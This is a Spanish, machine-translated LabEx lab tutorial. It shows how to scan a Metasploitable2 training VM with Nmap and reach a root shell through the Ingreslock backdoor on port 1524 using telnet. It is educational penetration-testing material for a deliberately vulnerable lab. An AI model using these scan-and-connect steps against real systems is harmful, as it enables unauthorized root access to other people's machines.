Explotación de la Vulnerabilidad Ingreslock con Nmap

NmapNmapBeginner
Practicar Ahora

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderás cómo explotar la vulnerabilidad del servicio Ingreslock para obtener acceso de superusuario (root) a una máquina objetivo. El entorno del laboratorio se basa en las máquinas virtuales Kali y Metasploitable2 proporcionadas por LabEx. El objetivo de este laboratorio es comprender la vulnerabilidad de Ingreslock, realizar un escaneo de penetración utilizando Nmap y, finalmente, obtener acceso de superusuario a la máquina Metasploitable2 a través de la explotación de la puerta trasera (backdoor) de Ingreslock.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") wireshark/WiresharkGroup -.-> wireshark/packet_capture("Packet Capture") subgraph Lab Skills nmap/port_scanning -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} nmap/host_discovery -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} nmap/target_specification -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} nmap/timing_performance -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} nmap/service_detection -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} wireshark/packet_capture -.-> lab-416124{{"Explotación de la Vulnerabilidad Ingreslock con Nmap"}} end

Comprender la vulnerabilidad de Ingreslock y configurar el entorno

La vulnerabilidad de Ingreslock es un defecto de seguridad antiguo pero aún relevante relacionado con el sistema de gestión de bases de datos (DBMS) Ingres. Los atacantes a menudo utilizan el puerto TCP 1524 como puerto de puerta trasera (backdoor) para mantener el acceso a los sistemas comprometidos.

En este paso, aprenderás sobre la vulnerabilidad de Ingreslock y sus implicaciones.

La vulnerabilidad de Ingreslock se deriva del hecho de que los atacantes solían utilizar comúnmente el puerto TCP 1524 como puerto de escucha de la puerta trasera después de comprometer con éxito un sistema. La simplicidad de explotar esta vulnerabilidad radica en la capacidad de obtener acceso de nivel superusuario (root) a la máquina objetivo simplemente conectándose al puerto abierto.

Si bien esta vulnerabilidad se considera antigua, aún está presente en algunos sistemas heredados, lo que la hace digna de comprensión y exploración en un entorno controlado.

  1. Abre una terminal xfce en la máquina host de LabEx y inicia la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Prueba la conectividad a la máquina objetivo mediante un ping:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor de Kali Linux y entra al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor de Kali, prueba la conexión de red a la máquina objetivo:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Realizar un escaneo de penetración

En este paso, realizarás un escaneo de penetración en la máquina objetivo Metasploitable2 utilizando Nmap para identificar los puertos abiertos y los servicios que se ejecutan en la máquina objetivo.

  1. Inicia la máquina virtual Metasploitable2 y asegúrate de que esté en funcionamiento.
  2. Inicia el contenedor de Kali y entra en la shell bash.
  3. Dentro del contenedor de Kali, ejecuta el siguiente comando para realizar un escaneo completo en la máquina objetivo:
nmap -sV -T4 target-ip-address

La opción -sV instruye a Nmap a sondear los puertos abiertos para determinar la información del servicio/versión, mientras que -T4 establece la plantilla de tiempo en un nivel agresivo (valores más altos de 0 a 5 aumentan la agresividad).

Inicia el servicio PostgreSQL e inicializa la base de datos de Metasploit:

cd ~
service postgresql start
msfdb init

Inicia la consola de Metasploit:

msfconsole

Realiza un escaneo completo en la máquina objetivo:

nmap -sV -T4 192.168.122.102

A continuación, se muestra un ejemplo de la salida que podrías ver:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

Esta serie de comandos inicia el servicio PostgreSQL, inicializa la base de datos de Metasploit, inicia la consola de Metasploit y luego realiza un escaneo completo en la máquina objetivo utilizando Nmap.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Explotar la puerta trasera (backdoor) de Ingreslock

En este paso, explotarás la vulnerabilidad de la puerta trasera de Ingreslock para obtener acceso de superusuario (root) a la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Instala el paquete telnet en la consola de Metasploit:
apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet
  1. Utiliza el comando telnet para conectarte al puerto de la puerta trasera de Ingreslock en la máquina objetivo:
telnet 192.168.122.102 1524

Si la conexión es exitosa, deberías obtener acceso de superusuario a la máquina objetivo.

  1. Ahora, debes verificar que la explotación de la puerta trasera de Ingreslock fue exitosa comprobando la dirección IP, el nombre de host y el usuario actual en la máquina comprometida. Después de conectarte a la máquina objetivo a través de la puerta trasera de Ingreslock, ejecuta los siguientes comandos:

Comprueba la dirección IP de la máquina comprometida:

ifconfig

Comprueba el nombre de host de la máquina comprometida:

hostname

Comprueba el usuario actual en la máquina comprometida:

whoami

Si la explotación fue exitosa, deberías ver la dirección IP, el nombre de host y el usuario actual como root en la máquina objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Resumen

En este laboratorio, aprendiste sobre la vulnerabilidad de Ingreslock, que permitía a los atacantes obtener acceso de superusuario (root) a los sistemas comprometidos conectándose al puerto TCP 1524. Realizaste un escaneo de penetración utilizando Nmap para identificar los puertos abiertos y los servicios en la máquina objetivo. Después de detectar el puerto de la puerta trasera (backdoor) de Ingreslock, explotaste la vulnerabilidad utilizando el comando telnet para obtener acceso de superusuario. Finalmente, verificaste la explotación exitosa comprobando la dirección IP, el nombre de host y el usuario actual en la máquina comprometida. Este laboratorio proporcionó experiencia práctica en la comprensión y explotación de una vulnerabilidad del mundo real, enfatizando la importancia de aplicar parches de seguridad y endurecer los sistemas contra este tipo de puertas traseras.